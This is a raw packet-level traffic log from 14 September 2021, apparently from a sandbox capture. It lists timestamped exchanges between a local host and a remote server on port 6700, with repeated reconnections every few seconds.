Sep 14, 2021 16:48:38.659439087 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659461975 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659487009 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659487009 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659560919 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.802459002 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.843512058 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.843554974 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.843571901 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.843594074 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.843610048 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.843631029 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.843652964 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.843916893 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.845700979 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845742941 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845769882 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845793962 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845817089 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845839024 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845860958 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845881939 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845904112 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845926046 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845952988 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845978975 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.846004009 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.845957994 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.846057892 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.846065998 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.846132994 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.851021051 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.851142883 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.851200104 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.851239920 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.851315975 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.851358891 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.851417065 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.851502895 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.851511955 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.851833105 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.851958990 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.852068901 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.852150917 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.852184057 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.852241039 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.852355957 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.852596045 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.852611065 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.852617025 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.853575945 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.853740931 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.853835106 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.853879929 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.853919983 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.853950024 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.853972912 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.853986025 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854018927 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.854044914 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854110003 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854197979 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854295969 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854336023 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854361057 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854434013 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854470015 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854573965 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854625940 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854764938 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.854825974 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.855225086 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.855259895 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.855264902 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.855268002 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.855272055 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.855274916 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.855278015 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.855281115 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.855283976 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.035094023 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.036731005 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.036812067 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.036878109 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.036892891 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.036917925 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.037128925 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.037149906 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.037177086 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.037204027 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.037230015 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.037233114 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.037256956 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.037265062 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.037283897 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.037360907 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.038738012 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.038775921 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.038801908 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.038826942 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.038851976 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.038857937 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.038881063 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.038903952 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.038942099 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.038965940 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.038968086 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.038990021 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039011002 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039030075 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.039036036 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039061069 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039089918 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039094925 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.039134026 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.039134026 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039160967 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039191008 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039202929 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.039215088 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039241076 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039266109 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039278984 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.039290905 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039318085 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039328098 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.039345980 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039371967 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039381027 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.039397955 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039423943 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.039443016 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.039490938 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.043982029 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044028044 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044049978 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044075012 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044101000 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044111013 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044126987 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044151068 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044166088 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044176102 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044200897 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044214010 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044229031 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044255972 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044262886 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044280052 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044306040 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044325113 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044331074 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044353008 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044374943 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044375896 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044399023 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044421911 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044425011 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044450998 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044471979 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044473886 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044498920 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044524908 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044545889 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044555902 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044604063 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044629097 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044658899 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044717073 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044792891 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044819117 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.044864893 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.044929028 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.045011997 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.045042038 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.045103073 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.046518087 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.046557903 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.046629906 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.046667099 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.046677113 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.046725988 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.046760082 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.046828985 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.046890974 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.046946049 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.047027111 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.047090054 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.047210932 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.047236919 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.047288895 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.047305107 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.047332048 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.047379971 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.047415018 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.098282099 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.228418112 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:39.270112038 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:39.900599003 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:44.984978914 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:45.175719023 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:45.175893068 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:45.277862072 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:45.486105919 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:45.486625910 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:45.678240061 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:45.724143028 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:45.742158890 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:45.990597963 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:45.990796089 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:46.103058100 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:46.146096945 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:46.181994915 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:46.223831892 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:46.337054968 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:46.385292053 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:46.791924000 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:47.037916899 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:47.038139105 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:47.229507923 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:47.286348104 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:47.286715031 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:47.477300882 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:47.521095037 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:47.523227930 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:47.668556929 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:47.912555933 CEST	6700	49835	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:47.980071068 CEST	49835	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:52.176103115 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:52.367372990 CEST	6700	49838	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:52.367888927 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:52.368710995 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:52.574096918 CEST	6700	49838	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:52.574215889 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:52.814182997 CEST	6700	49838	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:52.815946102 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:53.007262945 CEST	6700	49838	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:53.036221027 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:53.282682896 CEST	6700	49838	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:53.430536032 CEST	6700	49838	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:53.431607008 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:53.622396946 CEST	6700	49838	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:53.622625113 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:53.860663891 CEST	6700	49838	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:53.860775948 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:54.052251101 CEST	6700	49838	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:54.099544048 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:54.290719986 CEST	6700	49838	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:54.391814947 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:54.491529942 CEST	49838	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:59.671320915 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:59.863452911 CEST	6700	49841	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:59.863596916 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:59.864669085 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:00.071424961 CEST	6700	49841	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:00.075241089 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:00.266541004 CEST	6700	49841	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:00.316086054 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:00.550630093 CEST	6700	49841	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:00.550817966 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:00.679224968 CEST	6700	49841	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:00.725052118 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:00.741806984 CEST	6700	49841	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:00.742044926 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:00.915988922 CEST	6700	49841	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:00.959532022 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:00.988049030 CEST	6700	49841	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:00.988162041 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:01.179352045 CEST	6700	49841	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:01.179641008 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:01.370709896 CEST	6700	49841	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:01.412646055 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:01.445139885 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:01.691523075 CEST	6700	49841	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:02.623975992 CEST	49841	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:06.831478119 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:07.022284031 CEST	6700	49842	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:07.022473097 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:07.089533091 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:07.293587923 CEST	6700	49842	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:07.323141098 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:07.516782999 CEST	6700	49842	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:07.563034058 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:07.800436020 CEST	6700	49842	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:07.800550938 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:07.943660975 CEST	6700	49842	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:07.991255045 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:07.992050886 CEST	6700	49842	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:07.992173910 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:08.182482958 CEST	6700	49842	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:08.225666046 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:08.237871885 CEST	6700	49842	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:08.237981081 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:08.429712057 CEST	6700	49842	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:08.475732088 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:08.570317030 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:08.667705059 CEST	6700	49842	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:08.710064888 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:08.816169977 CEST	6700	49842	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:09.618525028 CEST	49842	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:13.904457092 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:14.096756935 CEST	6700	49843	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:14.097290039 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:14.149940968 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:14.359544039 CEST	6700	49843	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:14.368948936 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:14.560319901 CEST	6700	49843	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:14.562886953 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:14.819726944 CEST	6700	49843	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:14.819845915 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:14.903465033 CEST	6700	49843	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:14.945120096 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:15.010938883 CEST	6700	49843	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:15.011215925 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:15.137254953 CEST	6700	49843	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:15.179440975 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:15.276635885 CEST	6700	49843	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:15.277172089 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:15.468704939 CEST	6700	49843	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:15.525834084 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:15.716703892 CEST	6700	49843	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:15.773540974 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:15.807437897 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:16.056343079 CEST	6700	49843	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:16.823210955 CEST	49843	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:21.063337088 CEST	49844	6700	192.168.2.4	194.147.140.20
